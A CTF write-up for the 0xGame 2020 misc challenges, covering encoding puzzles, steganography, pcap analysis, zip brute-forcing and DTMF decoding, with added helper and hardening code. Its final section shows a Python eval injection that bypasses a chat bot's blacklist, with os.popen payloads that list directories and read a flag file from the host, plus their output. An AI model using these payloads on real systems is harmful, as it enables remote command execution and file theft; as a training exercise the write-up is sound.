week1

Sign-in

Reading the rules gives the flag:

0xGame{Welc0m_to_0xGame2020}

easyBase

Recognisably base64 encoding at a glance; decoding it as base16 is all it takes.

QR_repair

Take QQ screenshots of the two incomplete QR codes, stitch them together in Meitu Xiuxiu, find a picture of a QR code corner (finder pattern) on Baidu and paste it on, then scan with WeChat.

lowerBase64

Solved by brute-forcing the case of every group of four characters.
Official writeup:
Base64 takes the plaintext three bytes at a time (24 bits) and regroups them into four new characters of 6 bits each, so when brute-forcing we have to work in groups of four, enumerate every upper/lower-case combination of the group, and decode.
exp:

from base64 import b64decode
from itertools import product

c = 'mhhnyw1lezviodq1ntkxltmwmditngjlny1hzgi5lwu4m2q1ntcymtblnx0='
table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-{}'

flag = b""
real_data = ""
for i in range(0, len(c), 4):
    # every upper/lower-case variant of this 4-character group
    pos = []
    for char in c[i:i+4]:
        pos.append([char.lower(), char.upper()])
    cases = ["".join(k) for k in product(*pos)]
    for case in cases:
        # keep the first variant whose three decoded bytes are all flag characters
        if all(chr(char) in table for char in b64decode(case)):
            real_data += case
            flag += b64decode(case)
            break
print(real_data)
print(flag.decode())
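The official exp stops at the first case variant of each group that decodes to flag characters, which silently picks a wrong group when two variants both look plausible. The following is an added example, not code from the writeup or the organisers: it keeps every valid re-casing per group and returns all candidate plaintexts, so collisions show up instead of being hidden. The sample flag it encodes is constructed; the character table is the one from the exp above.

```python
# Added example (not from the writeup): recover the original case of a
# lowercased base64 string, keeping every group that decodes to flag
# characters so case collisions surface as multiple candidates.
from base64 import b64decode, b64encode
from itertools import product
import binascii

# Characters expected in the decoded flag (same table as the writeup's exp)
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-{}"


def group_candidates(group):
    """Every 3-byte plaintext that some re-casing of one 4-char base64 group
    decodes to, restricted to plaintexts made only of ALPHABET characters.
    A base64 group is self-contained (24 bits), so groups are independent."""
    # Digits, '=', '+' and '/' have no case, so they contribute one choice each
    choices = [sorted({ch.lower(), ch.upper()}) for ch in group]
    found = set()
    for combo in product(*choices):
        try:
            raw = b64decode("".join(combo), validate=True)
        except binascii.Error:
            continue  # cannot happen for a well-formed group; kept for safety
        if raw and all(chr(b) in ALPHABET for b in raw):
            found.add(raw.decode("ascii"))
    return sorted(found)


def recover(lowered):
    """All plausible plaintexts for a lowercased base64 string
    (empty list if some group has no valid re-casing at all)."""
    if len(lowered) % 4:
        raise ValueError("base64 length must be a multiple of 4")
    per_group = [group_candidates(lowered[i:i + 4])
                 for i in range(0, len(lowered), 4)]
    if not all(per_group):
        return []
    return sorted("".join(parts) for parts in product(*per_group))


if __name__ == "__main__":
    # Constructed input: a made-up flag, base64-encoded and then lowercased
    secret = "0xGame{Fl4g-Test}"
    lowered = b64encode(secret.encode()).decode().lower()
    for candidate in recover(lowered):
        print(candidate)
```

For flag-length input the cross product of per-group candidates stays small; on long inputs it grows multiplicatively, so for those you would rank candidates (for example by requiring the `0xGame{` prefix) rather than enumerate them all.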

pcap

Open it in Wireshark and search for HTTP POST: there is a file upload of type zip. Export the HTTP object as a zip, unzip it to get an image, and fix the image's width and height.
A small unintended solution: binwalk can carve the zip file out directly.

week2

Differentpic

Open it in StegSolve in image compare mode and a QR code appears; save the QR code, open it, change the filter, and scan it to get the flag.

Extract

Extract it with binwalk to get a QR code; scanning it hints at stegpy. Search for stegpy to find how it is used, then decode the image with stegpy to get the flag.

week3

threeThousand

Write a script:

import os
import zipfile

fileIndex = 3000

# Layout implied by the loop: N.zip unpacks to (N-1).zip behind a two-digit
# password. Try 00..99 on each layer, extract it, delete the outer archive
# and move one level inward.
while fileIndex != 1:
    fileName = "%d.zip" % fileIndex
    print("beginning extract: " + fileName)
    with zipfile.ZipFile(fileName, 'r') as f:
        for i in range(0, 100):
            try:
                f.extractall(pwd=('%02d' % i).encode("utf-8"), path=r"./")
                print("pwd = %02d" % i)
                break
            except Exception:
                # a wrong password raises RuntimeError("Bad password ..."); a wrong
                # password that passes ZIP's one-byte check shows up as corrupt
                # data instead, so every failure is treated as a miss
                pass
    os.remove(r"./%s" % fileName)
    fileIndex = fileIndex - 1

easyMisc

Press F12 and two lines appear:

<!--ZWFzeU1pc2MvZmxhZy56aXA=-->

<!--ZWFzeU1pc2MvcmVjb3JkLndhdg==-->

Both are base64; decode them and append the results to the URL to get a zip archive and a wav file. The cat hint image, decoded with stegpy, says the archive password comes from the wav (a hint that adds nothing). Open the wav in Audition: it is DTMF, which gives the archive password. Unzip, run stegpy on the extracted image, and get the flag.
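Reading the DTMF tones off Audition's spectral view works, but the step is easy to automate. The following is an added example, not part of the writeup: it synthesises a constructed DTMF sequence and decodes it with a Goertzel filter per 20 ms frame. The sample rate, tone and gap lengths, and the detection threshold are my own assumptions; a real capture would be read from the wav with the `wave` module into the same list of float samples.

```python
# Added example (not from the writeup): DTMF decoding with the Goertzel
# algorithm. RATE, tone/gap lengths and min_ratio are assumptions.
import math

RATE = 8000                       # samples per second (assumed)
LOW = [697, 770, 852, 941]        # DTMF row frequencies, Hz
HIGH = [1209, 1336, 1477, 1633]   # DTMF column frequencies, Hz
KEYS = ["123A", "456B", "789C", "*0#D"]


def synth_dtmf(digits, tone_ms=100, gap_ms=60, amp=0.25):
    """Constructed test signal: each key is a row tone plus a column tone,
    followed by silence. Returns a list of float samples."""
    samples = []
    for d in digits:
        row = next(r for r, keys in enumerate(KEYS) if d in keys)
        col = KEYS[row].index(d)
        for n in range(RATE * tone_ms // 1000):
            t = n / RATE
            samples.append(amp * math.sin(2 * math.pi * LOW[row] * t)
                           + amp * math.sin(2 * math.pi * HIGH[col] * t))
        samples.extend([0.0] * (RATE * gap_ms // 1000))
    return samples


def goertzel_power(frame, freq):
    """|X(f)|^2 of one frame at one frequency (generalised Goertzel, so
    freq does not need to sit on a DFT bin)."""
    w = 2 * math.pi * freq / RATE
    coeff = 2 * math.cos(w)
    s1 = s2 = 0.0
    for x in frame:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def detect_key(frame, min_ratio=0.6):
    """Key pressed during this frame, or None for silence/noise.
    A clean two-tone frame puts nearly all its energy into two Goertzel
    bins; the strongest row+column pair must hold min_ratio of it."""
    energy = sum(x * x for x in frame)
    if energy < 1e-9:
        return None
    lows = [goertzel_power(frame, f) for f in LOW]
    highs = [goertzel_power(frame, f) for f in HIGH]
    r = max(range(4), key=lows.__getitem__)
    c = max(range(4), key=highs.__getitem__)
    # For N samples, a sinusoid carrying energy E gives |X|^2 of about (N/4) * E
    if lows[r] + highs[c] < min_ratio * (len(frame) / 4) * energy:
        return None
    return KEYS[r][c]


def decode_dtmf(samples, frame_ms=20):
    """Walk the signal frame by frame; a key is emitted once per press, and
    a silent frame resets the state so repeated digits ('11') stay distinct."""
    n = RATE * frame_ms // 1000
    keys, last = [], None
    for i in range(0, len(samples) - n + 1, n):
        key = detect_key(samples[i:i + n])
        if key is not None and key != last:
            keys.append(key)
        last = key
    return "".join(keys)


if __name__ == "__main__":
    print(decode_dtmf(synth_dtmf("1100*#")))  # prints 1100*#
```

Frames are 20 ms because DTMF tones are at least 40 ms long with a 40 ms gap, so each press covers several frames and each gap at least one silent frame; the energy-ratio test is what keeps a noisy silent frame from being read as a key.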

week4

flip

After extracting the folder, open pwd.mp3 in Audition and write down the Morse code; decode it and, as the challenge says, reverse the order of the password to open the archive. It contains a txt file; reverse each binary number in it one by one, feed them to JDK, convert binary to ASCII and get the second password. A picture hidden in the archive has to be carved out with binwalk in Kali; the image is encrypted, and the second password is exactly what unlocks the flag image. Scan the QR code for the flag.

Hex酱

I don't know Python, so I couldn't do it; the only Misc challenge I didn't solve.
Official writeup:
It is really a web challenge.
Source:

import random
import base64
import hashlib

wrong_msg = ["我可运行不了这种呀", "不支持这么写啦", "看不懂这种呀", "哎呀,没有运行成功~"]


def keyword_filter(keyword, msg):
    # True when every character of keyword occurs somewhere in msg,
    # which is not the same as keyword occurring in msg
    for i in keyword:
        if i not in msg:
            return False
    return True


def py_filter(msg):
    for keyword in ["class", "eval", "exec", "input", "listdir", "help", "powershell", "cmd", "shutdown", "del", "logoff", "sys", "globals", "builtins", "getattr", "pow"]:
        if keyword_filter(keyword, msg):
            return [False, keyword]
    if "**" in msg:
        return [False, "**"]
    return [True]


def do_python(msg):
    try:
        msg = msg[6:-1]
        print(msg)
        key_word = py_filter(msg)
        if key_word[0]:
            temp = eval(msg)
        else:
            return "包含关键词:" + key_word[1]
        if temp != None:
            return str(temp)
        else:
            return random.choice(wrong_msg)
    except:
        return random.choice(wrong_msg)


def rcode(msg):
    if msg[:6] == "print(" and msg[-1] == ")":
        return [True, do_python(msg)]
    if (msg[:4] == "md5(" or msg[:4] == "MD5(") and msg[-1] == ")":
        return [True, hashlib.md5(msg[4:-1].encode()).hexdigest()]
    if (msg[:7] == "sha256(" or msg[:7] == "SHA256(") and msg[-1] == ")":
        return [True, hashlib.sha256(msg[7:-1].encode()).hexdigest()]
    if (msg[:7] == "sha512(" or msg[:7] == "SHA512(") and msg[-1] == ")":
        return [True, hashlib.sha512(msg[7:-1].encode()).hexdigest()]
    if msg[:10] == "b64encode(" and msg[-1] == ")":
        return [True, base64.b64encode(msg[10:-1].encode()).decode()]
    if msg[:10] == "b64decode(" and msg[-1] == ")":
        return [True, base64.b64decode(msg[10:-1]).decode()]
    return [None]

It simply calls eval to run Python code; bypass the blacklist filter with a Python command injection and you get the flag.
The blacklist triggers whenever every character of a keyword appears somewhere in the message, not when the keyword itself appears.
The filter barely does anything: it looks like a lot is filtered, but import os is not.
Windows is case-insensitive, so writing everything in upper case works, which leaves plenty of ways to get the flag.
Binary encoding works too.
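The lesson for anyone writing a bot like this is that a blacklist in front of eval cannot be patched into safety; the expression has to be parsed and only known-safe syntax evaluated. The following is an added example, not the challenge's code: it keeps the bot's commands (print, md5/sha256/sha512, b64encode/b64decode) but replaces eval with an AST walk that accepts only numeric literals and arithmetic, so names, calls, attributes, subscripts and `**` are rejected by construction. The MAX_ABS bound and the error strings are my own choices.

```python
# Added example (not the challenge's code): the bot's commands without eval().
# Only numeric literals and + - * / // % are evaluated; everything else is
# rejected because it is not in the whitelist, so there is no blacklist to bypass.
import ast
import base64
import hashlib
import operator

BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Div: operator.truediv,
           ast.FloorDiv: operator.floordiv, ast.Mod: operator.mod}
UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}
MAX_ABS = 10 ** 30   # assumed bound so repeated multiplication cannot exhaust memory


def _eval_node(node):
    # Plain int/float literals (bool is an int subclass; keep it out too)
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)) \
            and not isinstance(node.value, bool):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in BIN_OPS:
        result = BIN_OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
        if abs(result) > MAX_ABS:
            raise ValueError("result too large")
        return result
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](_eval_node(node.operand))
    # Name, Call, Attribute, Subscript, Pow, strings, ... all land here
    raise ValueError("unsupported syntax: " + type(node).__name__)


def safe_calc(expr):
    """Evaluate an arithmetic expression without eval()."""
    tree = ast.parse(expr, mode="eval")   # SyntaxError for anything that is not an expression
    return _eval_node(tree.body)


def keyword_in_msg(keyword, msg):
    """What the original keyword_filter meant: a substring test, not
    'every character of the keyword occurs somewhere in msg'."""
    return keyword in msg


def rcode_safe(msg):
    """Drop-in replacement for rcode(): same commands, no eval."""
    if msg.startswith("print(") and msg.endswith(")"):
        try:
            return [True, str(safe_calc(msg[6:-1]))]
        except (SyntaxError, ValueError, ZeroDivisionError, RecursionError) as e:
            return [True, "rejected: %s" % e]
    for name in ("md5", "sha256", "sha512"):
        if msg.lower().startswith(name + "(") and msg.endswith(")"):
            data = msg[len(name) + 1:-1].encode()
            return [True, hashlib.new(name, data).hexdigest()]
    if msg.startswith("b64encode(") and msg.endswith(")"):
        return [True, base64.b64encode(msg[10:-1].encode()).decode()]
    if msg.startswith("b64decode(") and msg.endswith(")"):
        try:
            return [True, base64.b64decode(msg[10:-1], validate=True).decode()]
        except (ValueError, UnicodeDecodeError) as e:
            return [True, "rejected: %s" % e]
    return [None]


if __name__ == "__main__":
    print(rcode_safe("print(2*(3+4))"))        # [True, '14']
    print(rcode_safe("print(__import__('os'))"))  # rejected: unsupported syntax: Call
```

Because the whitelist is on AST node types rather than on characters, case tricks, encodings and attribute chains never reach an interpreter: anything that is not a number or an arithmetic operator fails before evaluation starts. The substring helper shows the fix for the original keyword_filter logic, but it is deliberately unused here, since a correct blacklist would still leave eval reachable.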
The simplest approach, running a system command through the os library:

print(__import__('os').popen('WHOAMI').read())
izozp2s3d5jnzaz\administrator

List the files in the current directory:

print(__import__('os').popen('DIR').read())
2020/11/03 15:52 <DIR> .
2020/11/03 15:52 <DIR> ..
2020/08/11 11:39 <DIR> app
2020/08/11 11:39 <DIR> conf
2020/08/11 11:39 <DIR> data
2020/09/24 16:23 <DIR> go-cqhttp
2020/08/11 11:39 <DIR> httpapi
2020/09/22 20:38 1,312 main_bot.py
2020/09/18 01:20 1,813 massage_filter.py
2020/11/03 15:52 1,850 runcode.py
2020/09/18 01:20 <DIR> __pycache__

Show the current path:

print(__import__('os').popen('CD').read())
C:\Users\Administrator\Desktop\Game\HexQBot

List the parent directory:

print(__import__('os').popen('DIR ..\\').read())
2020/09/30 00:33 <DIR> .
2020/09/30 00:33 <DIR> ..
2020/10/27 00:13 <DIR> HexQBot
2020/09/30 00:33 9,440,520 HexQBot.zip
2020/09/30 00:33 <DIR> __MACOSX

List the Desktop:

# QQ sometimes shows no output because of its message length limit; adding /b to dir fixes that
# In Windows challenges the flag is usually on the Desktop
print(__import__('os').popen('DIR /B ..\\..\\').read())
or
print(__import__('os').popen('DIR /B %USERPROFILE%\\DESKTOP').read())
or
print(__import__('os').popen('DIR /B C:\\USERS\\ADMINISTRATOR\\DESKTOP').read())
BtSoft.exe
Game
go-cqhttp-v0.9.17-windows-amd64.zip
Google Chrome.lnk
here_is_flag.txt
HexQBot
HexQBot - 副本
HexQBot - 副本.zip
jdk-14.0.2_windows-x64_bin.exe
Mirai整合包Dice+铃心564
Mirai整合包Dice+铃心564.zip
pycryptodome-3.9.8-cp36-cp36m-win_amd64.whl
python-3.7.6-amd64.exe
task
Visual Studio Code.lnk
yafu-1.34
yafu-1.34.zip
宝塔面板.lnk

The flag file is visible on the Desktop: here_is_flag.txt
Read the flag:

print(__import__('os').popen('TYPE %USERPROFILE%\\DESKTOP\\HERE_IS_FLAG.TXT').read())
or with the ? wildcard:
print(__import__('os').popen('TYPE %USERPROFILE%\\DESKTOP\\????_??_????.???').read())
or with *:
print(__import__('os').popen('TYPE %USERPROFILE%\\DESKTOP\\HER*').read())
#0xGame{621a9c2d-0f24-40fc-b5e2-8d8018e5165b}

Next time there is a Windows challenge the flag may well be put on an internal network service; maybe a bit of domain penetration?